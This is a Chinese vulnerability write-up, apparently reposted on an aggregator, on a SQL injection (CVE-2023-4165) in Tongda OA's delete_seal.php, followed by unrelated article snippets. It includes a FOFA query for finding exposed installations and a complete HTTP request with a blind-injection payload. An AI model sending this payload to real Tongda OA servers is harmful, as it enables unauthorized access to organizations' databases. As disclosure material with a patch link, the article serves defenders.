通达OA SQL注入漏洞【CVE-2023-4165】

通达OA SQL注入漏洞【CVE-2023-4165】

  • 一、产品简介
  • 二、漏洞概述
  • 三、影响范围
  • 四、复现环境
    • POC
    • 小龙POC检测工具:
  • 五、修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。

二、漏洞概述

漏洞1(CVE-2023-4165)General/system/seal_manage/iweboffice/delete_seal.php 文件,对参数 DELETE_STR 的操作会导致 sql 注入。

三、影响范围

通达OA ≤ v11.10,v2017

在这里插入图片描述

四、复现环境

FOFA语法:app=“TDXK-通达OA” && icon_hash=“-759108386”

POC

General/system/seal_manage/iweboffice/delete_seal.php

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c74d7ebb
Connection: close

在这里插入图片描述

小龙POC检测工具:

在这里插入图片描述
在这里插入图片描述

五、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.tongda2000.com/download/p2022.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/1382225.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

百度地图标注公司那家好

目前传统的商业模式已经无法满足创业者的发展需求,想要有更好更快的发展可以通过网络来进行推广,腾讯地图标注这是一种全新的推广模式,现在每个人几乎都在用手机来进行。上网,在手机上下载各种各样的地图来寻找自己的目的地&#…

如何在UI自动化测试中加入REST API的操作

1、问题 当我们描述一个“好的自动化测试用例”时,经常出现标准是: 精确 自动化测试用例应该测试一件事,只有一件事。与测试用例无关的应用程序的某个部分中的错误不应导致测试用例失败。 独立 自动化测试用例不应该受测试套件中任何其他…

将QQ和微信的保存路径由C盘转移到其他盘

将QQ和微信的保存路径由C盘转移到其他盘 (1)QQ中的文件通过右键点击QQ头像——》选择系统设置——》选择文件管理——》选择更改目录 完成以后,需要重启一下QQ即可。 (2)右键点击微信——》选择设置——》选择文件…

pc版微信聊天记录备份迁移

1. 备份:定期备份文件夹 C:\Users\${username}\Documents\WeChat Files (${username}为微信安装的windows用户名) 2. 恢复: (1). 新机器安装成功微信后先别启动 ,将 备份的WeChat Files 文件夹复制到 C:\Users\${username}\Doc…

固态硬盘的合盘及数据转移

场景 1.在C盘空间不足时,我们会想到把其他的盘的数据分给C盘,这样就会涉及到数据转移的问题。 2.在硬盘分区合并的时候,有的两分区中间会有一个恢复分区,导致不能合并的情况。 解决 分盘 1.右键我的电脑,点击管理 …

6.2.0在线编辑:GrapeCity Documents for Word (GcWord) Crack

GrapeCity Word 文档 (GcWord) 支持 Office Math 函数以及转换为 MathML GcWord 现在支持在 Word 文档中创建和编辑 Office Math 内容。GcWord 中的 OMath 支持包括完整的 API,可处理科学、数学和通用 Word 文档中广泛使用的数学符号、公式和方程。以下是通过 OMa…

男宝宝起名的三大思路

男宝宝起名的三大思路 最近有个哥们正在为一件事情烦恼,开始的时候咱们都觉得挺奇怪的,这哥们现在可以说是家庭事业双丰收了,到底还有什么事儿能让他这么的烦恼呢?询问之下,这个哥们儿向我们吐了苦水,不为别的&#x…

九重鸿蒙浮屠塔,浮图塔测算(浮图塔黄历老黄历)

浮图塔是什么 // 浮图塔就是佛塔. ※浮图:梵语 1、佛陀(简称佛)的别名。 2、佛塔。亦作“佛图”、“浮屠”。 魏书˙卷一一四˙释老志:“自洛中构白马寺,盛 饰佛图,画迹甚妙,为四方式。 凡宫塔制度,犹依天竺…

关于阿里云服务器密码重置和使用方法

总是记不住密码,今天又重置了阿里云服务器的远程连接密码,在这里做个记录,方便以后查找。 一定注意,重置完实例密码要重启! Windows 系统 默认的用户名为administrator 密码为重置密码 一定注意,重置完…

阿里云服务器密码重置

目录 一、进入阿里云官网管理控制台 二、选择重置实例密码​ 三、保存 四、网页远程连接服务器 一、进入阿里云官网管理控制台 首先进入阿里云官网,登录你的阿里云账号进入阿里云的管理控制台,然后进入ECS管理后台,如下图。 二、选择重置实例…

服务器密码忘记处理之二:重置密码

步骤1:进入BIOS。 不同的系统进入的方式不尽相同,我的环境是DELL服务器安装的Windows Server 2008 r2 Standard版,在重启的时候,一直按着delete键,进入BIOS。 步骤2:选择启动盘启动服务器。 步骤3&#…

重置目录服务还原模式(DSRM)密码

重置目录服务还原模式(DSRM)密码 重置操作命令说明 重置操作 命令说明 PS C:\Users\Administrator> ntdsutil C:\Windows\system32\ntdsutil.exe: Set DSRM Password 重置 DSRM 管理员密码: Reset Password on server NULL 请键入 DS 还原模式 Admin…

阿里云轻量服务器如何重置密码?

我们在开通阿里云轻量应用服务器的时候,是没有设置服务器密码的地方的,而且服务器也没有初始密码,所以就需要我们开通好轻量应用服务器后去重置下服务器密码,那么如何重置密码呢? 首先,打开轻量应用服务器…

腾讯云服务器如何修改和重置密码?

在上一篇我们介绍了如何购买腾讯云服务器,现在来讲讲购买服务器之后,如何重置和修改腾讯云服务器密码。步骤过程很简单,虽然我描述的有点详细。 【修改云服务器密码(Linux操作系统)】 远程连接 Linux 实例(实例就是你的服务器)时,提示用户名或…

mysql如何重置密码

1. 关闭MySQL服务 点击系统偏好设置->最下边点MySQL,在弹出页面中,关闭服务 2.打开终端 ① 进入mysql文件夹 cd /usr/local/mysql/bin 回车②获取权限 sudo su 回车,然后输入开机密码,回车③进入安全模式 ./m…

MySQL--忘记密码,重置密码重启服务密码失效(Windows)

一、问题说明 最近在Windows下操作mysql数据库,我装的是mysql5.7版本的,但是忘记了安装时设置的密码, 通过mysqld -nt --skip-grant-tables 跳过安全检查登录重置了密码 修改后使用新密码,能正常登陆成功,但老是发生…

重置Google云服务器密码

1、进入Google云实例面板 2、切换到root角色 sudo -i 3、修改root密码 passwd[qqqqqinstance-3 ~]$ sudo su [rootinstance-3 guser]# passwd Changing password for user root. New password: Retype new password:

移动邮箱(139):开启服务+密码登录

移动邮箱(139):开启服务密码登录 官网:https://mail.10086.cn/ 帮助:http://help.mail.10086.cn/statichtml/0/Category/223/List_1.html 关联阅读: 139邮箱服务器地址是什么?如何开启POP3和IMA…

服务器server2012重置开机密码

准备工作 1.制作u盘启动(pe)该操作很简单(大白菜、老毛桃等) 2.下载操作系统镜像 重置密码方法 一、通过进入pe系统,使用管理密码工具操作步骤: 1.点击vmware操作系统设置——添加硬盘——选择scsi——…

DELL服务器重置iDRAC密码

1.DELL服务iDRAC有默认的用户和密码:root/calvin,一般我们会修改,一段时间不用,忘记密码怎么办? 2.开机,DELL LOGO画面过后,按F2,进入主板控制界面 选iDRACsetting 3.翻页到user c…